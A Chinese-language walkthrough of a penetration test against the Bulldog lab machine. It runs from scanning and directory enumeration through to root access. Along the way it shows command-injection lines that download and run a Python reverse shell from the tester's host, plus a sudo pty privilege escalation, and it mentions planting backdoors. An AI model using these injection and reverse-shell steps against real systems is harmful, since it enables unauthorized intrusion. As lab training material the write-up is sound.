靶机渗透测试实战（三）—

一. 实验环境

靶机：IP地址暂时未知；

测试机：kali IP地址：192.168.37.131

测试机：物理机win7

二. 实验流程

信息收集——主机发现

信息收集——端口扫描

信息收集——操作系统扫描

Web渗透

三. 实验步骤

（1）信息收集——主机发现

1. 查看Kali的IP信息；（IP：192.168.37.131）

2. 扫描主机（netdiscover）

netdiscover -i eth0 -r 192.168.37.0/24

Netdiscover： -i 指定网卡 -r 指定网段

找到目标主机IP：192.168.37.141

也可以使用nmap进行主机发现，在使用nmap进行主机发现时，会扫描出本机的IP地址，而netdiscover则不会扫描出本机IP地址

（2）信息收集——端口扫描

1. 扫描端口（masscan）

masscan --rate=10000 --ports 0-65535 192.168.37.139

masscan --rate=每秒多少个数据包 --ports 端口范围 IP地址/IP地址段

Masscan扫描速度快，快速发现开放的端口，为了防止漏扫，可以多扫描几次；

2. 扫描端口的详细信息（nmap）

nmap -sV -T4 -p 23,80,8080 192.168.37.141

其中：-T4指定扫描过程中使用的时序（分为0-5等级）；

-sV扫描版本的信息和开启的服务；

也可以选择带-A参数，详细扫描开放端口的具体服务；

与masscan相比，namp更详细，但是速度较慢（可以通过masscan快速扫描开放的端口，再使用nmap扫描具体开放的端口）；

可以发现192.168.37.141主机开启了23（ssh服务），80（http服务），8080（http）端口；

（3）信息收集——操作系统扫描

1. 扫描操作系统的信息（nmap）

nmap -O 192.168.37.141

（4）Web渗透

80端口（http服务）

1. 发现目标开启http服务，访问80端口

2. 查看可以点击的内容；

点击Bulldog Industries

点击Public Notice

访问网页上可以点击的信息，没有发现什么有价值的信息，继续探索；

3. 网站指纹信息扫描

whatweb 192.168.37.141

Web指纹扫描用于识别目标所运行的web软件、后端服务器、编程语言等特征，实现对目标的web应用的准确标识。

应用名称（版本）、服务器软件（版本）、编程语言（版本）、应用框架（版本）四大特征的识别。

4. 目录扫描（dirb）

dirb http://192.168.37.141

扫描Web目录，可以发现潜在的渗透目标；

发现/admin/auth/group , /admin/auth/user , /admin/login , /dev/shell 等目录；

该工具根据用户提供的字典，对目标网站目录进行暴力猜测。尝试以递归方式进行爆破，以发现更多的路径；

5. 查看扫描到的web目录

5.1> 访问http://192.168.37.141/admin/

并尝试弱口令登录，SQL注入；

发现网站的登录页面；

尝试弱口令登录，没有成功；

尝试SQL注入，没有成功；

这里可以尝试使用暴力破解登录账号和密码；

5.2> 访问http://192.168.37.141/dev/

翻译页面的信息可知：

完全从新服务器中删除PHP。此外，不使用PHPMyAdmin或任何其他流行的CMS系统；

新网站将完全用Django语言编写。目前，系统上启用了SSH。当我们转换到使用Web-Shell(一个专有的shell接口)时，这个选项将被关闭；

此外，请注意我们将开始使用MongoDB，但是我们还没有完全安装它；

点击UNDER DEVELOPMENT，返回到主页；

点击Web-Shell，需要与服务器建立认证；

好像也没有发现什么有价值的信息；

6. 查看前端页面的代码

6.1> 查看http://192.168.37.141/admin/的前端代码

没有发现可以突破的信息；

6.2> 查看http://192.168.37.141/dev/的前端代码

发现了许多疑似加密的密码，尝试进行MD5破解；

分析源码可以猜测：

用户名为nick，密码为bulldog；

用户名为sarah，密码为bulldoglover；

7. 尝试进行登录主页

用户名为nick，密码为bulldog；

用户名为sarah，密码为bulldoglover；

认证成功之后，尝试访问http://192.168.37.141/dev/shell/；

8. 获取shell

8.1> 发现只能使用给定的几个命令；尝试命令注入；

8.2> 可以进行命令注入后，尝试wget是否有权限；

在测试机Kali上执行python -m SimpleHTTPServer 80，搭建简易Web服务；

输入如下命令：pwd & wget http://192.168.37.131；

在Kali上监听到访问记录；证明wget有权限；

8.3> 将python shell脚本下载到目标靶机系统；

在Kali的web访问目录下准备shell.py；并执行python -m SimpleHTTPServer 80，搭建简易Web服务（注：web服务在/var/www/html目录下开启，当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start）；

输入如下命令：pwd & wget http://192.168.37.131/shell.py；

成功将shell.py下载到目标系统；

8.4> python反弹shell，获取目标shell；

在测试机Kali上执行python -m SimpleHTTPServer 80，搭建简易Web服务；

监听1234端口；

在webshell上执行如下命令：pwd & wget ls & python shell.py；

在kali上进行查看；已经成功获取到目标shell；

9. 提权操作

9.1> 查看系统中的用户；需要关注的用户bulldogadmin，django；

9.2> 进入用户bulldogadmin的家目录下，查看家目录下有什么文件；

发现一个隐藏目录 .hiddenadmindirectory；

该隐藏目录下存在两个文件，一个note提示，一个可执行文件；查看两个文件的内容；

利用strings查看可执行文件中的内容；（strings命令用来提取和显示非文本文件中的文本字符串）

猜测可能是密码，应为SUPER、 ulitimate、PASSWORD、youCANTget，可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget，H是来混淆的，中间刚好有PADDWORD；

9.3> 尝试用获取的密码登录；

su命令不能执行；

用python命令打开一个新的终端，尝试进行提权，输入命令：sudo python -c 'import pty; pty.spawn("/bin/bash")'；

进行其他操作，留后门等；

四. 实验总结

针对目录爆破出dev和admin页面：通过查看页面可以点击的超链接，说明，源代码等获取可用的信息，即登录用户名和密码；

登录成功后，获取webshell，并使用命令执行漏洞绕过白名单限制，执行命令和python反弹shell；

搭建临时web服务（python -m SimpleHTTPServer 80）

成功获取目标主机shell后，搜索系统中id为1000以后的用户的文件，可以找到隐藏文件（猜解root密码），进行提权操作；